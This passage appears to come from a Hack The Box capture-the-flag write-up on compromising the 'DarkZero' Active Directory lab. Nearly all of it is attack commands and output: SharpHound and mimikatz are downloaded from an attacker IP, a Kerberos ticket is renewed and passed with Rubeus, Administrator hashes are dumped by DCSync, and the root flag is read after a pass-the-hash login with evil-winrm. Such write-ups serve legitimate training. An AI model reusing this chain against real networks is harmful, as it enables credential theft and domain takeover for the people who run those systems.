DzIwMjUxMDA3MjExNTE3WqcRGA8yMDI1MTAxNDExMTUxN1qoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI= /dc:dc01.darkzero.htb /nowrapsharphound
sh
Invoke-WebRequest http://10.10.14.4/SharpHound.exe -OutFile SharpHound.exesh
.\SharpHound.exe -c All --zipfilename darkzerosh
(Meterpreter 2)(C:\users\administrator\documents) > download 20251007044535_darkzero.zip
sh
PS C:\Users\Administrator\Documents> Get-DomainTrust
Get-DomainTrust
SourceName : darkzero.ext
TargetName : darkzero.htb
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FOREST_TRANSITIVE
TrustDirection : Bidirectional
WhenCreated : 7/29/2025 3:30:19 PM
WhenChanged : 9/29/2025 6:25:18 PMsh
Invoke-WebRequest http://10.10.14.4/mimikatz.exe -OutFile mimikatz.exesh
.\Rubeus.exe renew /ticket:doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDY3QKoNcknXuijGJycr4+zRGRMwxzdD+OZMJqwUHCpwXm8BCpyoSaWkFMIqyNQS9umWG28lTreDsY1tMz/XCFeu71fpc0jz/Qc9iQ1AAGFjrDsqFPTSnthWMUG8x9C90pyDtaIoZ4hxibYrq6ZWF70DzPG4+j2XTI+Mgf0zehh4FwnvMrVawDUko92wfPd+eJmLgCl6wWSN3ASr5J8W/uhLbnqcqRJb/GT/IimECYFebcGkrWs8Rj37AU5JxpYFnXRntGxUyl7mdLUaRm4CICZSxU2dzyTedv+ckzZheaGQRxDPMCPYBrkJ+JrBKTR3E7d7FD/ys/VSP3J/sZGQO0qXjydyLmQiJ6xUI+rGWeJyp+wHX46/W56GL/TUcSUwHE7wg/aFLINkweyhwyIh7KpnhB3FT4O6VNEZBnc/5NlAwIuQG/ql510z0YUP3Hvl0a7ZzxruNE3KU2s1epx+wUe6MK3Y8AzstZYayf8xY+/YaRyKCkbv/fONsNgfensYp7MWosXnJy6Q9X8Kg/oDQ2AcCoiT5xWE9JqWDL6G2wPDm6T6AfZJrLIOksNjOWJbOOComESyAYdxvGfGlBrvtiDvq7K+Zit6ICFbzIkoVFsJv53tYgpui0V+XUyJ68MBlqXKUSxFNHuouMtOHXWKGZH/xa0DD7rtWKBuWYXcF9imvVMFqiNOnjNk5z3kioj9wGmCjUSETkoWxKvHpbEuODcHOmJyofQbmQtXXTx103M/NBspy0GhRfMAOPdyGZN34qdKWpcVnyQ+RdgIhMRRHHEWg/5sZvx2/5b5GNztde798N9qXWC78j4l/ZqAKR5I06l7N3m7GrHGgZCuHgqHWWI5aRj6qZxw4svHffYsgoGDyXVO9Z7o1Eo1jgGbp7iK8vH/ehGhWsQQjxVZxcoiC+RmWUQ3GkAjCxGb927x3pShnMVrQwyssDm65ietS5KNScVb9Jl/kILvYZB8/yVd4q/m0H6dk8kC5emKDqi7xM6Nl0O5Jbnzv03ncfd2qRjHBxdCPLR0wWse7/KuFvSolQtAI2Ok/mgkkZ5WRp46HX4ZooorXozmNEuWbb5mHxeITcxYmPCE0ZnXoCnOXK8jwdr/X4Zc5+cCRR0a4WI+lvbmOsFdU6DKbXajIRTiowkNqN5z92R6DCedI62AaxCo5wEBG1RkyAGSmwdwH8ML+RVMbF7AAxqPrzAvrS4voUd6Rz4BUTH6vI7VF8VE+CbN5AnItrd+cUFjgUe+IWsTqIuCGPgrEgj1qH3LxC/lcLEFuzI0Tg9sfvGuE5sDCnfPQqQEZbxjm7Q7Qsl+qK4TDf84uqG0W4RCBO4Bd70sU2gcaL3x32JiSXTCPyF+LDi3WMH3tIZrpxr6HaE4n1cc4Pmigl5RaFmv+qwe49w8SLZ0j7kU4Nhfxai+CCHtDxX3ojwzLXRZl4Oro4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQgg09bOk1z92GA4znD49Q9IwswrmDpCYsnYNf3HOplaU2hDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNTEwMDcxMTE1MTdaphEYDzIwMjUxMDA3MjExNTE3WqcRGA8yMDI1MTAxNDExMTUxN1qoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI= /pttsh
PS C:\users\administrator\documents> klist
klist
Current LogonId is 0:0x3e7
Cached Tickets: (1)
#0> Client: DC01$ @ DARKZERO.HTB
Server: krbtgt/DARKZERO.HTB @ DARKZERO.HTB
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 10/7/2025 5:59:29 (local)
End Time: 10/7/2025 15:59:29 (local)
Renew Time: 10/14/2025 4:15:17 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called: sh
.\mimikatz.exesh
lsadump::dcsync /domain:darkzero.htb /user:administrator
[DC] 'darkzero.htb' will be the domain
[DC] 'DC01.darkzero.htb' will be the DC server
[DC] 'administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 9/10/2025 9:42:44 AM
Object Security ID : S-1-5-21-1152179935-589108180-1989892463-500
Object Relative ID : 500
Credentials:
Hash NTLM: 5917507b...
ntlm- 0: 5917507b...
ntlm- 1: 5917507b...
lm - 0: 58ef6687...
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : eb8f12be...
* Primary:Kerberos-Newer-Keys *
Default Salt : DARKZERO.HTBAdministrator
Default Iterations : 4096
Credentials
des_cbc_md5_nt (4096) : 2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
unknow (4096) : a23315d9...
aes256_hmac (4096) : d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
aes128_hmac (4096) : b1e04b87...
rc4_hmac_nt (4096) : 5917507b...
ServiceCredentials
des_cbc_md5_nt (4096) : 2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
unknow (4096) : a23315d9...
aes256_hmac (4096) : d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
aes128_hmac (4096) : b1e04b87...
OldCredentials
des_cbc_md5_nt (4096) : 298bc77657a3737b452bb09be407d46b795774e5c3bbfcc68e8f0a4015b59459
unknow (4096) : d1d84cca...
aes256_hmac (4096) : fe0ba028010ee4f408ebc846d3f480c1880a4f0274acdb226d3afcdc3595dc21
aes128_hmac (4096) : a2a7e0e9...
rc4_hmac_nt (4096) : 5917507b...
OlderCredentials
des_cbc_md5_nt (4096) : d828032ab803aa2d52a9db423de22fe27af55a9fd2101037b106e856ef515216
unknow (4096) : 5f9f4fbb...
aes256_hmac (4096) : ead37d7deb508c2ad7fd748960cb115d0857b23d95a69cfc95fa693d9d2ca987
aes128_hmac (4096) : d027d6df...
rc4_hmac_nt (4096) : cf3a5525...
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 059775b6...
02 cd2cdff8...
03 f807da3e...
04 059775b6...
05 3209c658...
06 c75dced3...
07 0fca3845...
08 7d1a78d4...
09 cec6c4e8...
10 81ee716a...
11 5a808b7d...
12 7d1a78d4...
13 c421d8af...
14 47b49319...
15 13ad2c29...
16 7f8a2135...
17 fa7267a1...
18 b8f360ed...
19 8ed43db2...
20 276189d1...
21 1726c96c...
22 bdbd5d77...
23 9131f668...
24 2e1e6980...
25 1b79e43d...
26 e64552e3...
27 bd8a3360...
28 9e10974f...
29 61c17ed3...sh
PS C:\users\administrator\documents> ping dc01.darkzero.htb
Pinging DC01.darkzero.htb [10.10.11.89] with 32 bytes of data:
Reply from 10.10.11.89: bytes=32 time<1ms TTL=127
Reply from 10.10.11.89: bytes=32 time<1ms TTL=127
Reply from 10.10.11.89: bytes=32 time<1ms TTL=127
Reply from 10.10.11.89: bytes=32 time<1ms TTL=127winrm
sh
evil-winrm -i 10.10.11.89 -u Administrator -H "5917507b..."
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
darkzero\administratorsh
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
adc7ceab...Up next
MediumOct 2025
HTB — Hercules
Windows machine leveraging MSSQL linked server abuse and xp_cmdshell to gain initial foothold, then DPAPI credential decryption for escalation.
Read writeup
MediumOct 2025
HTB — Conversor
Unit conversion web app vulnerable to server-side formula injection, leading to arbitrary OS command execution.
Read writeup
MediumNov 2025
HTB — Giveback
Custom network service with an authentication logic flaw. Protocol reverse engineering reveals a bypass path to root.
Read writeup